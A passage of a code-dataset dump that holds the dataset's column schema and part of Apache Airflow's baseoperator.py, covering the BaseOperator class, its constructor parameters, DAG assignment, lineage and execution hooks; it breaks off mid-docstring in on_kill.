hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
35be608818c17595509d79a7fc9f4c23cd5ee450
| 75,972
|
py
|
Python
|
airflow/models/baseoperator.py
|
boschglobal/airflow
|
de36616e1e3b578d9a5b6727daf7a32fe15c4c32
|
[
"Apache-2.0"
] | null | null | null |
airflow/models/baseoperator.py
|
boschglobal/airflow
|
de36616e1e3b578d9a5b6727daf7a32fe15c4c32
|
[
"Apache-2.0"
] | null | null | null |
airflow/models/baseoperator.py
|
boschglobal/airflow
|
de36616e1e3b578d9a5b6727daf7a32fe15c4c32
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Base operator for all operators."""
import abc
import copy
import functools
import logging
import sys
import warnings
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from inspect import signature
from types import FunctionType
from typing import (
TYPE_CHECKING,
Any,
Callable,
ClassVar,
Dict,
FrozenSet,
Iterable,
List,
Optional,
Sequence,
Set,
Tuple,
Type,
TypeVar,
Union,
cast,
)
import attr
import jinja2
import pendulum
from dateutil.relativedelta import relativedelta
from sqlalchemy.orm import Session
from sqlalchemy.orm.exc import NoResultFound
import airflow.templates
from airflow.compat.functools import cached_property
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskDeferred
from airflow.lineage import apply_lineage, prepare_lineage
from airflow.models.base import Operator
from airflow.models.param import ParamsDict
from airflow.models.pool import Pool
from airflow.models.taskinstance import Context, TaskInstance, clear_task_instances
from airflow.models.taskmixin import TaskMixin
from airflow.models.xcom import XCOM_RETURN_KEY
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.ti_deps.deps.not_in_retry_period_dep import NotInRetryPeriodDep
from airflow.ti_deps.deps.not_previously_skipped_dep import NotPreviouslySkippedDep
from airflow.ti_deps.deps.prev_dagrun_dep import PrevDagrunDep
from airflow.ti_deps.deps.trigger_rule_dep import TriggerRuleDep
from airflow.triggers.base import BaseTrigger
from airflow.utils import timezone
from airflow.utils.edgemodifier import EdgeModifier
from airflow.utils.helpers import render_template_as_native, render_template_to_string, validate_key
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.operator_resources import Resources
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.trigger_rule import TriggerRule
from airflow.utils.weight_rule import WeightRule
if TYPE_CHECKING:
from airflow.models.dag import DAG
from airflow.models.xcom_arg import XComArg
from airflow.utils.task_group import TaskGroup
ScheduleInterval = Union[str, timedelta, relativedelta]
TaskStateChangeCallback = Callable[[Context], None]
TaskPreExecuteHook = Callable[[Context], None]
TaskPostExecuteHook = Callable[[Context, Any], None]
T = TypeVar('T', bound=FunctionType)
class BaseOperatorMeta(abc.ABCMeta):
"""Metaclass of BaseOperator."""
@classmethod
def _apply_defaults(cls, func: T) -> T:
"""
Function decorator that Looks for an argument named "default_args", and
fills the unspecified arguments from it.
Since python2.* isn't clear about which arguments are missing when
calling a function, and that this can be quite confusing with multi-level
inheritance and argument defaults, this decorator also alerts with
specific information about the missing arguments.
"""
# Cache inspect.signature for the wrapper closure to avoid calling it
# at every decorated invocation. This is separate sig_cache created
# per decoration, i.e. each function decorated using apply_defaults will
# have a different sig_cache.
sig_cache = signature(func)
non_optional_args = {
name
for (name, param) in sig_cache.parameters.items()
if param.default == param.empty
and param.name != 'self'
and param.kind not in (param.VAR_POSITIONAL, param.VAR_KEYWORD)
}
class autostacklevel_warn:
def __init__(self):
self.warnings = __import__('warnings')
def __getattr__(self, name):
return getattr(self.warnings, name)
def __dir__(self):
return dir(self.warnings)
def warn(self, message, category=None, stacklevel=1, source=None):
self.warnings.warn(message, category, stacklevel + 2, source)
if func.__globals__.get('warnings') is sys.modules['warnings']:
# Yes, this is slightly hacky, but it _automatically_ sets the right
# stacklevel parameter to `warnings.warn` to ignore the decorator. Now
# that the decorator is applied automatically, this makes the needed
# stacklevel parameter less confusing.
func.__globals__['warnings'] = autostacklevel_warn()
@functools.wraps(func)
def apply_defaults(self, *args: Any, **kwargs: Any) -> Any:
from airflow.models.dag import DagContext
from airflow.utils.task_group import TaskGroupContext
if len(args) > 0:
raise AirflowException("Use keyword arguments when initializing operators")
dag_args: Dict[str, Any] = {}
dag_params = ParamsDict()
dag: Optional[DAG] = kwargs.get('dag') or DagContext.get_current_dag()
if dag:
dag_args = copy.copy(dag.default_args) or dag_args
dag_params = copy.deepcopy(dag.params) or dag_params
task_group = TaskGroupContext.get_current_task_group(dag)
if task_group:
dag_args.update(task_group.default_args)
params = kwargs.get('params', {}) or {}
dag_params.update(params)
default_args = {}
if 'default_args' in kwargs:
default_args = kwargs['default_args']
if 'params' in default_args:
dag_params.update(default_args['params'])
del default_args['params']
dag_args.update(default_args)
default_args = dag_args
for arg in sig_cache.parameters:
if arg not in kwargs and arg in default_args:
kwargs[arg] = default_args[arg]
missing_args = list(non_optional_args - set(kwargs))
if missing_args:
msg = f"Argument {missing_args} is required"
raise AirflowException(msg)
if dag_params:
kwargs['params'] = dag_params
if default_args:
kwargs['default_args'] = default_args
if hasattr(self, '_hook_apply_defaults'):
args, kwargs = self._hook_apply_defaults(*args, **kwargs)
result = func(self, *args, **kwargs)
# Here we set upstream task defined by XComArgs passed to template fields of the operator
self.set_xcomargs_dependencies()
# Mark instance as instantiated https://docs.python.org/3/tutorial/classes.html#private-variables
self._BaseOperator__instantiated = True
return result
return cast(T, apply_defaults)
def __new__(cls, name, bases, namespace, **kwargs):
new_cls = super().__new__(cls, name, bases, namespace, **kwargs)
new_cls.__init__ = cls._apply_defaults(new_cls.__init__)
return new_cls
@functools.total_ordering
class BaseOperator(Operator, LoggingMixin, TaskMixin, metaclass=BaseOperatorMeta):
"""
Abstract base class for all operators. Since operators create objects that
become nodes in the dag, BaseOperator contains many recursive methods for
dag crawling behavior. To derive this class, you are expected to override
the constructor as well as the 'execute' method.
Operators derived from this class should perform or trigger certain tasks
synchronously (wait for completion). Example of operators could be an
operator that runs a Pig job (PigOperator), a sensor operator that
waits for a partition to land in Hive (HiveSensorOperator), or one that
moves data from Hive to MySQL (Hive2MySqlOperator). Instances of these
operators (tasks) target specific operations, running specific scripts,
functions or data transfers.
This class is abstract and shouldn't be instantiated. Instantiating a
class derived from this one results in the creation of a task object,
which ultimately becomes a node in DAG objects. Task dependencies should
be set by using the set_upstream and/or set_downstream methods.
:param task_id: a unique, meaningful id for the task
:type task_id: str
:param owner: the owner of the task. Using a meaningful description
(e.g. user/person/team/role name) to clarify ownership is recommended.
:type owner: str
:param email: the 'to' email address(es) used in email alerts. This can be a
single email or multiple ones. Multiple addresses can be specified as a
comma or semi-colon separated string or by passing a list of strings.
:type email: str or list[str]
:param email_on_retry: Indicates whether email alerts should be sent when a
task is retried
:type email_on_retry: bool
:param email_on_failure: Indicates whether email alerts should be sent when
a task failed
:type email_on_failure: bool
:param retries: the number of retries that should be performed before
failing the task
:type retries: int
:param retry_delay: delay between retries, can be set as ``timedelta`` or
``float`` seconds, which will be converted into ``timedelta``,
the default is ``timedelta(seconds=300)``.
:type retry_delay: datetime.timedelta or float
:param retry_exponential_backoff: allow progressively longer waits between
retries by using exponential backoff algorithm on retry delay (delay
will be converted into seconds)
:type retry_exponential_backoff: bool
:param max_retry_delay: maximum delay interval between retries, can be set as
``timedelta`` or ``float`` seconds, which will be converted into ``timedelta``.
:type max_retry_delay: datetime.timedelta or float
:param start_date: The ``start_date`` for the task, determines
the ``execution_date`` for the first task instance. The best practice
is to have the start_date rounded
to your DAG's ``schedule_interval``. Daily jobs have their start_date
some day at 00:00:00, hourly jobs have their start_date at 00:00
of a specific hour. Note that Airflow simply looks at the latest
``execution_date`` and adds the ``schedule_interval`` to determine
the next ``execution_date``. It is also very important
to note that different tasks' dependencies
need to line up in time. If task A depends on task B and their
start_date are offset in a way that their execution_date don't line
up, A's dependencies will never be met. If you are looking to delay
a task, for example running a daily task at 2AM, look into the
``TimeSensor`` and ``TimeDeltaSensor``. We advise against using
dynamic ``start_date`` and recommend using fixed ones. Read the
FAQ entry about start_date for more information.
:type start_date: datetime.datetime
:param end_date: if specified, the scheduler won't go beyond this date
:type end_date: datetime.datetime
:param depends_on_past: when set to true, task instances will run
sequentially and only if the previous instance has succeeded or has been skipped.
The task instance for the start_date is allowed to run.
:type depends_on_past: bool
:param wait_for_downstream: when set to true, an instance of task
X will wait for tasks immediately downstream of the previous instance
of task X to finish successfully or be skipped before it runs. This is useful if the
different instances of a task X alter the same asset, and this asset
is used by tasks downstream of task X. Note that depends_on_past
is forced to True wherever wait_for_downstream is used. Also note that
only tasks *immediately* downstream of the previous task instance are waited
for; the statuses of any tasks further downstream are ignored.
:type wait_for_downstream: bool
:param dag: a reference to the dag the task is attached to (if any)
:type dag: airflow.models.DAG
:param priority_weight: priority weight of this task against other task.
This allows the executor to trigger higher priority tasks before
others when things get backed up. Set priority_weight as a higher
number for more important tasks.
:type priority_weight: int
:param weight_rule: weighting method used for the effective total
priority weight of the task. Options are:
``{ downstream | upstream | absolute }`` default is ``downstream``
When set to ``downstream`` the effective weight of the task is the
aggregate sum of all downstream descendants. As a result, upstream
tasks will have higher weight and will be scheduled more aggressively
when using positive weight values. This is useful when you have
multiple dag run instances and desire to have all upstream tasks to
complete for all runs before each dag can continue processing
downstream tasks. When set to ``upstream`` the effective weight is the
aggregate sum of all upstream ancestors. This is the opposite where
downstream tasks have higher weight and will be scheduled more
aggressively when using positive weight values. This is useful when you
have multiple dag run instances and prefer to have each dag complete
before starting upstream tasks of other dags. When set to
``absolute``, the effective weight is the exact ``priority_weight``
specified without additional weighting. You may want to do this when
you know exactly what priority weight each task should have.
Additionally, when set to ``absolute``, there is bonus effect of
significantly speeding up the task creation process as for very large
DAGs. Options can be set as string or using the constants defined in
the static class ``airflow.utils.WeightRule``
:type weight_rule: str
:param queue: which queue to target when running this job. Not
all executors implement queue management, the CeleryExecutor
does support targeting specific queues.
:type queue: str
:param pool: the slot pool this task should run in, slot pools are a
way to limit concurrency for certain tasks
:type pool: str
:param pool_slots: the number of pool slots this task should use (>= 1)
Values less than 1 are not allowed.
:type pool_slots: int
:param sla: time by which the job is expected to succeed. Note that
this represents the ``timedelta`` after the period is closed. For
example if you set an SLA of 1 hour, the scheduler would send an email
soon after 1:00AM on the ``2016-01-02`` if the ``2016-01-01`` instance
has not succeeded yet.
The scheduler pays special attention for jobs with an SLA and
sends alert
emails for SLA misses. SLA misses are also recorded in the database
for future reference. All tasks that share the same SLA time
get bundled in a single email, sent soon after that time. SLA
notification are sent once and only once for each task instance.
:type sla: datetime.timedelta
:param execution_timeout: max time allowed for the execution of
this task instance, if it goes beyond it will raise and fail.
:type execution_timeout: datetime.timedelta
:param on_failure_callback: a function to be called when a task instance
of this task fails. a context dictionary is passed as a single
parameter to this function. Context contains references to related
objects to the task instance and is documented under the macros
section of the API.
:type on_failure_callback: TaskStateChangeCallback
:param on_execute_callback: much like the ``on_failure_callback`` except
that it is executed right before the task is executed.
:type on_execute_callback: TaskStateChangeCallback
:param on_retry_callback: much like the ``on_failure_callback`` except
that it is executed when retries occur.
:type on_retry_callback: TaskStateChangeCallback
:param on_success_callback: much like the ``on_failure_callback`` except
that it is executed when the task succeeds.
:type on_success_callback: TaskStateChangeCallback
:param pre_execute: a function to be called immediately before task
execution, receiving a context dictionary; raising an exception will
prevent the task from being executed.
|experimental|
:type pre_execute: TaskPreExecuteHook
:param post_execute: a function to be called immediately after task
execution, receiving a context dictionary and task result; raising an
exception will prevent the task from succeeding.
|experimental|
:type post_execute: TaskPostExecuteHook
:param trigger_rule: defines the rule by which dependencies are applied
for the task to get triggered. Options are:
``{ all_success | all_failed | all_done | one_success |
one_failed | none_failed | none_failed_min_one_success | none_skipped | always}``
default is ``all_success``. Options can be set as string or
using the constants defined in the static class
``airflow.utils.TriggerRule``
:type trigger_rule: str
:param resources: A map of resource parameter names (the argument names of the
Resources constructor) to their values.
:type resources: dict
:param run_as_user: unix username to impersonate while running the task
:type run_as_user: str
:param max_active_tis_per_dag: When set, a task will be able to limit the concurrent
runs across execution_dates.
:type max_active_tis_per_dag: int
:param executor_config: Additional task-level configuration parameters that are
interpreted by a specific executor. Parameters are namespaced by the name of
executor.
**Example**: to run this task in a specific docker container through
the KubernetesExecutor ::
MyOperator(...,
executor_config={
"KubernetesExecutor":
{"image": "myCustomDockerImage"}
}
)
:type executor_config: dict
:param do_xcom_push: if True, an XCom is pushed containing the Operator's
result
:type do_xcom_push: bool
:param task_group: The TaskGroup to which the task should belong. This is typically provided when not
using a TaskGroup as a context manager.
:type task_group: airflow.utils.task_group.TaskGroup
:param doc: Add documentation or notes to your Task objects that is visible in
Task Instance details View in the Webserver
:type doc: str
:param doc_md: Add documentation (in Markdown format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_md: str
:param doc_rst: Add documentation (in RST format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_rst: str
:param doc_json: Add documentation (in JSON format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_json: str
:param doc_yaml: Add documentation (in YAML format) or notes to your Task objects
that is visible in Task Instance details View in the Webserver
:type doc_yaml: str
"""
# For derived classes to define which fields will get jinjaified
template_fields: Iterable[str] = ()
# Defines which files extensions to look for in the templated fields
template_ext: Iterable[str] = ()
# Template field renderers indicating type of the field, for example sql, json, bash
template_fields_renderers: Dict[str, str] = {}
# Defines the color in the UI
ui_color = '#fff' # type: str
ui_fgcolor = '#000' # type: str
pool = "" # type: str
# base list which includes all the attrs that don't need deep copy.
_base_operator_shallow_copy_attrs: Tuple[str, ...] = (
'user_defined_macros',
'user_defined_filters',
'params',
'_log',
)
# each operator should override this class attr for shallow copy attrs.
shallow_copy_attrs: Tuple[str, ...] = ()
# Defines the operator level extra links
operator_extra_links: Iterable['BaseOperatorLink'] = ()
# The _serialized_fields are lazily loaded when get_serialized_fields() method is called
__serialized_fields: Optional[FrozenSet[str]] = None
_comps = {
'task_id',
'dag_id',
'owner',
'email',
'email_on_retry',
'retry_delay',
'retry_exponential_backoff',
'max_retry_delay',
'start_date',
'end_date',
'depends_on_past',
'wait_for_downstream',
'priority_weight',
'sla',
'execution_timeout',
'on_execute_callback',
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
'do_xcom_push',
}
# Defines if the operator supports lineage without manual definitions
supports_lineage = False
# If True then the class constructor was called
__instantiated = False
# Set to True before calling execute method
_lock_for_execution = False
_dag: Optional["DAG"] = None
# subdag parameter is only set for SubDagOperator.
# Setting it to None by default as other Operators do not have that field
subdag: Optional["DAG"] = None
def __init__(
self,
task_id: str,
owner: str = conf.get('operators', 'DEFAULT_OWNER'),
email: Optional[Union[str, Iterable[str]]] = None,
email_on_retry: bool = conf.getboolean('email', 'default_email_on_retry', fallback=True),
email_on_failure: bool = conf.getboolean('email', 'default_email_on_failure', fallback=True),
retries: Optional[int] = conf.getint('core', 'default_task_retries', fallback=0),
retry_delay: Union[timedelta, float] = timedelta(seconds=300),
retry_exponential_backoff: bool = False,
max_retry_delay: Optional[Union[timedelta, float]] = None,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
depends_on_past: bool = False,
wait_for_downstream: bool = False,
dag: Optional['DAG'] = None,
params: Optional[Dict] = None,
default_args: Optional[Dict] = None,
priority_weight: int = 1,
weight_rule: str = conf.get('core', 'default_task_weight_rule', fallback=WeightRule.DOWNSTREAM),
queue: str = conf.get('operators', 'default_queue'),
pool: Optional[str] = None,
pool_slots: int = 1,
sla: Optional[timedelta] = None,
execution_timeout: Optional[timedelta] = None,
on_execute_callback: Optional[TaskStateChangeCallback] = None,
on_failure_callback: Optional[TaskStateChangeCallback] = None,
on_success_callback: Optional[TaskStateChangeCallback] = None,
on_retry_callback: Optional[TaskStateChangeCallback] = None,
pre_execute: Optional[TaskPreExecuteHook] = None,
post_execute: Optional[TaskPostExecuteHook] = None,
trigger_rule: str = TriggerRule.ALL_SUCCESS,
resources: Optional[Dict] = None,
run_as_user: Optional[str] = None,
task_concurrency: Optional[int] = None,
max_active_tis_per_dag: Optional[int] = None,
executor_config: Optional[Dict] = None,
do_xcom_push: bool = True,
inlets: Optional[Any] = None,
outlets: Optional[Any] = None,
task_group: Optional["TaskGroup"] = None,
doc: Optional[str] = None,
doc_md: Optional[str] = None,
doc_json: Optional[str] = None,
doc_yaml: Optional[str] = None,
doc_rst: Optional[str] = None,
**kwargs,
):
from airflow.models.dag import DagContext
from airflow.utils.task_group import TaskGroupContext
super().__init__()
if kwargs:
if not conf.getboolean('operators', 'ALLOW_ILLEGAL_ARGUMENTS'):
raise AirflowException(
f"Invalid arguments were passed to {self.__class__.__name__} (task_id: {task_id}). "
f"Invalid arguments were:\n**kwargs: {kwargs}",
)
warnings.warn(
f'Invalid arguments were passed to {self.__class__.__name__} (task_id: {task_id}). '
'Support for passing such arguments will be dropped in future. '
f'Invalid arguments were:\n**kwargs: {kwargs}',
category=PendingDeprecationWarning,
stacklevel=3,
)
validate_key(task_id)
self.task_id = task_id
self.label = task_id
dag = dag or DagContext.get_current_dag()
task_group = task_group or TaskGroupContext.get_current_task_group(dag)
if task_group:
self.task_id = task_group.child_id(task_id)
task_group.add(self)
self.owner = owner
self.email = email
self.email_on_retry = email_on_retry
self.email_on_failure = email_on_failure
self.execution_timeout = execution_timeout
self.on_execute_callback = on_execute_callback
self.on_failure_callback = on_failure_callback
self.on_success_callback = on_success_callback
self.on_retry_callback = on_retry_callback
self._pre_execute_hook = pre_execute
self._post_execute_hook = post_execute
self.start_date = start_date
if start_date and not isinstance(start_date, datetime):
self.log.warning("start_date for %s isn't datetime.datetime", self)
elif start_date:
self.start_date = timezone.convert_to_utc(start_date)
self.end_date = end_date
if end_date:
self.end_date = timezone.convert_to_utc(end_date)
if retries is not None and not isinstance(retries, int):
try:
parsed_retries = int(retries)
except (TypeError, ValueError):
raise AirflowException(f"'retries' type must be int, not {type(retries).__name__}")
id = task_id
if dag:
id = f'{dag.dag_id}.{id}'
self.log.warning("Implicitly converting 'retries' for task %s from %r to int", id, retries)
retries = parsed_retries
self.executor_config = executor_config or {}
self.run_as_user = run_as_user
self.retries = retries
self.queue = queue
self.pool = Pool.DEFAULT_POOL_NAME if pool is None else pool
self.pool_slots = pool_slots
if self.pool_slots < 1:
dag_str = f" in dag {dag.dag_id}" if dag else ""
raise ValueError(f"pool slots for {self.task_id}{dag_str} cannot be less than 1")
self.sla = sla
if trigger_rule == "dummy":
warnings.warn(
"dummy Trigger Rule is deprecated. Please use `TriggerRule.ALWAYS`.",
DeprecationWarning,
stacklevel=2,
)
trigger_rule = TriggerRule.ALWAYS
if trigger_rule == "none_failed_or_skipped":
warnings.warn(
"none_failed_or_skipped Trigger Rule is deprecated. "
"Please use `none_failed_min_one_success`.",
DeprecationWarning,
stacklevel=2,
)
trigger_rule = TriggerRule.NONE_FAILED_MIN_ONE_SUCCESS
if not TriggerRule.is_valid(trigger_rule):
raise AirflowException(
f"The trigger_rule must be one of {TriggerRule.all_triggers()},"
f"'{dag.dag_id if dag else ''}.{task_id}'; received '{trigger_rule}'."
)
self.trigger_rule = trigger_rule
self.depends_on_past = depends_on_past
self.wait_for_downstream = wait_for_downstream
if wait_for_downstream:
self.depends_on_past = True
if isinstance(retry_delay, timedelta):
self.retry_delay = retry_delay
else:
self.log.debug("Retry_delay isn't timedelta object, assuming secs")
self.retry_delay = timedelta(seconds=retry_delay)
self.retry_exponential_backoff = retry_exponential_backoff
self.max_retry_delay = max_retry_delay
if max_retry_delay:
if isinstance(max_retry_delay, timedelta):
self.max_retry_delay = max_retry_delay
else:
self.log.debug("max_retry_delay isn't a timedelta object, assuming secs")
self.max_retry_delay = timedelta(seconds=max_retry_delay)
# At execution_time this becomes a normal dict
self.params: Union[ParamsDict, dict] = ParamsDict(params)
if priority_weight is not None and not isinstance(priority_weight, int):
raise AirflowException(
f"`priority_weight` for task '{self.task_id}' only accepts integers, "
f"received '{type(priority_weight)}'."
)
self.priority_weight = priority_weight
if not WeightRule.is_valid(weight_rule):
raise AirflowException(
f"The weight_rule must be one of "
f"{WeightRule.all_weight_rules},'{dag.dag_id if dag else ''}.{task_id}'; "
f"received '{weight_rule}'."
)
self.weight_rule = weight_rule
self.resources: Optional[Resources] = Resources(**resources) if resources else None
if task_concurrency and not max_active_tis_per_dag:
# TODO: Remove in Airflow 3.0
warnings.warn(
"The 'task_concurrency' parameter is deprecated. Please use 'max_active_tis_per_dag'.",
DeprecationWarning,
stacklevel=2,
)
max_active_tis_per_dag = task_concurrency
self.max_active_tis_per_dag = max_active_tis_per_dag
self.do_xcom_push = do_xcom_push
self.doc_md = doc_md
self.doc_json = doc_json
self.doc_yaml = doc_yaml
self.doc_rst = doc_rst
self.doc = doc
# Private attributes
self._upstream_task_ids: Set[str] = set()
self._downstream_task_ids: Set[str] = set()
if dag:
self.dag = dag
self._log = logging.getLogger("airflow.task.operators")
# Lineage
self.inlets: List = []
self.outlets: List = []
self._inlets: List = []
self._outlets: List = []
if inlets:
self._inlets = (
inlets
if isinstance(inlets, list)
else [
inlets,
]
)
if outlets:
self._outlets = (
outlets
if isinstance(outlets, list)
else [
outlets,
]
)
def __eq__(self, other):
if type(self) is type(other):
# Use getattr() instead of __dict__ as __dict__ doesn't return
# correct values for properties.
return all(getattr(self, c, None) == getattr(other, c, None) for c in self._comps)
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
hash_components = [type(self)]
for component in self._comps:
val = getattr(self, component, None)
try:
hash(val)
hash_components.append(val)
except TypeError:
hash_components.append(repr(val))
return hash(tuple(hash_components))
# including lineage information
def __or__(self, other):
"""
Called for [This Operator] | [Operator], The inlets of other
will be set to pickup the outlets from this operator. Other will
be set as a downstream task of this operator.
"""
if isinstance(other, BaseOperator):
if not self._outlets and not self.supports_lineage:
raise ValueError("No outlets defined for this operator")
other.add_inlets([self.task_id])
self.set_downstream(other)
else:
raise TypeError(f"Right hand side ({other}) is not an Operator")
return self
# /Composing Operators ---------------------------------------------
def __gt__(self, other):
"""
Called for [Operator] > [Outlet], so that if other is an attr annotated object
it is set as an outlet of this Operator.
"""
if not isinstance(other, Iterable):
other = [other]
for obj in other:
if not attr.has(obj):
raise TypeError(f"Left hand side ({obj}) is not an outlet")
self.add_outlets(other)
return self
def __lt__(self, other):
"""
Called for [Inlet] > [Operator] or [Operator] < [Inlet], so that if other is
an attr annotated object it is set as an inlet to this operator
"""
if not isinstance(other, Iterable):
other = [other]
for obj in other:
if not attr.has(obj):
raise TypeError(f"{obj} cannot be an inlet")
self.add_inlets(other)
return self
def __setattr__(self, key, value):
super().__setattr__(key, value)
if self._lock_for_execution:
# Skip any custom behaviour during execute
return
if self.__instantiated and key in self.template_fields:
# Resolve upstreams set by assigning an XComArg after initializing
# an operator, example:
# op = BashOperator()
# op.bash_command = "sleep 1"
self.set_xcomargs_dependencies()
def add_inlets(self, inlets: Iterable[Any]):
"""Sets inlets to this operator"""
self._inlets.extend(inlets)
def add_outlets(self, outlets: Iterable[Any]):
"""Defines the outlets of this operator"""
self._outlets.extend(outlets)
def get_inlet_defs(self):
""":return: list of inlets defined for this operator"""
return self._inlets
def get_outlet_defs(self):
""":return: list of outlets defined for this operator"""
return self._outlets
@property
def dag(self) -> 'DAG':
"""Returns the Operator's DAG if set, otherwise raises an error"""
if self._dag:
return self._dag
else:
raise AirflowException(f'Operator {self} has not been assigned to a DAG yet')
@dag.setter
def dag(self, dag: Optional['DAG']):
"""
Operators can be assigned to one DAG, one time. Repeat assignments to
that same DAG are ok.
"""
from airflow.models.dag import DAG
if dag is None:
self._dag = None
return
if not isinstance(dag, DAG):
raise TypeError(f'Expected DAG; received {dag.__class__.__name__}')
elif self.has_dag() and self.dag is not dag:
raise AirflowException(f"The DAG assigned to {self} can not be changed.")
elif self.task_id not in dag.task_dict:
dag.add_task(self)
elif self.task_id in dag.task_dict and dag.task_dict[self.task_id] is not self:
dag.add_task(self)
self._dag = dag
def has_dag(self):
"""Returns True if the Operator has been assigned to a DAG."""
return self._dag is not None
@property
def dag_id(self) -> str:
"""Returns dag id if it has one or an adhoc + owner"""
if self.has_dag():
return self.dag.dag_id
else:
return 'adhoc_' + self.owner
deps: Iterable[BaseTIDep] = frozenset(
{
NotInRetryPeriodDep(),
PrevDagrunDep(),
TriggerRuleDep(),
NotPreviouslySkippedDep(),
}
)
"""
Returns the set of dependencies for the operator. These differ from execution
context dependencies in that they are specific to tasks and can be
extended/overridden by subclasses.
"""
def prepare_for_execution(self) -> "BaseOperator":
"""
Lock task for execution to disable custom action in __setattr__ and
returns a copy of the task
"""
other = copy.copy(self)
other._lock_for_execution = True
return other
def set_xcomargs_dependencies(self) -> None:
"""
Resolves upstream dependencies of a task. In this way passing an ``XComArg``
as value for a template field will result in creating upstream relation between
two tasks.
**Example**: ::
with DAG(...):
generate_content = GenerateContentOperator(task_id="generate_content")
send_email = EmailOperator(..., html_content=generate_content.output)
# This is equivalent to
with DAG(...):
generate_content = GenerateContentOperator(task_id="generate_content")
send_email = EmailOperator(
..., html_content="{{ task_instance.xcom_pull('generate_content') }}"
)
generate_content >> send_email
"""
from airflow.models.xcom_arg import XComArg
def apply_set_upstream(arg: Any):
if isinstance(arg, XComArg):
self.set_upstream(arg.operator)
elif isinstance(arg, (tuple, set, list)):
for elem in arg:
apply_set_upstream(elem)
elif isinstance(arg, dict):
for elem in arg.values():
apply_set_upstream(elem)
elif hasattr(arg, "template_fields"):
for elem in arg.template_fields:
apply_set_upstream(elem)
for field in self.template_fields:
if hasattr(self, field):
arg = getattr(self, field)
apply_set_upstream(arg)
@property
def priority_weight_total(self) -> int:
"""
Total priority weight for the task. It might include all upstream or downstream tasks.
depending on the weight rule.
- WeightRule.ABSOLUTE - only own weight
- WeightRule.DOWNSTREAM - adds priority weight of all downstream tasks
- WeightRule.UPSTREAM - adds priority weight of all upstream tasks
"""
if self.weight_rule == WeightRule.ABSOLUTE:
return self.priority_weight
elif self.weight_rule == WeightRule.DOWNSTREAM:
upstream = False
elif self.weight_rule == WeightRule.UPSTREAM:
upstream = True
else:
upstream = False
if not self._dag:
return self.priority_weight
from airflow.models.dag import DAG
dag: DAG = self._dag
return self.priority_weight + sum(
map(
lambda task_id: dag.task_dict[task_id].priority_weight,
self.get_flat_relative_ids(upstream=upstream),
)
)
@cached_property
def operator_extra_link_dict(self) -> Dict[str, Any]:
"""Returns dictionary of all extra links for the operator"""
op_extra_links_from_plugin: Dict[str, Any] = {}
from airflow import plugins_manager
plugins_manager.initialize_extra_operators_links_plugins()
if plugins_manager.operator_extra_links is None:
raise AirflowException("Can't load operators")
for ope in plugins_manager.operator_extra_links:
if ope.operators and self.__class__ in ope.operators:
op_extra_links_from_plugin.update({ope.name: ope})
operator_extra_links_all = {link.name: link for link in self.operator_extra_links}
# Extra links defined in Plugins overrides operator links defined in operator
operator_extra_links_all.update(op_extra_links_from_plugin)
return operator_extra_links_all
@cached_property
def global_operator_extra_link_dict(self) -> Dict[str, Any]:
"""Returns dictionary of all global extra links"""
from airflow import plugins_manager
plugins_manager.initialize_extra_operators_links_plugins()
if plugins_manager.global_operator_extra_links is None:
raise AirflowException("Can't load operators")
return {link.name: link for link in plugins_manager.global_operator_extra_links}
@prepare_lineage
def pre_execute(self, context: Any):
"""This hook is triggered right before self.execute() is called."""
if self._pre_execute_hook is not None:
self._pre_execute_hook(context)
def execute(self, context: Any):
"""
This is the main method to derive when creating an operator.
Context is the same dictionary used as when rendering jinja templates.
Refer to get_template_context for more context.
"""
raise NotImplementedError()
@apply_lineage
def post_execute(self, context: Any, result: Any = None):
"""
This hook is triggered right after self.execute() is called.
It is passed the execution context and any results returned by the
operator.
"""
if self._post_execute_hook is not None:
self._post_execute_hook(context, result)
def on_kill(self) -> None:
"""
Override this method to cleanup subprocesses when a task instance
gets killed. Any use of the threading, subprocess or multiprocessing
module within an operator needs to be cleaned up or it will leave
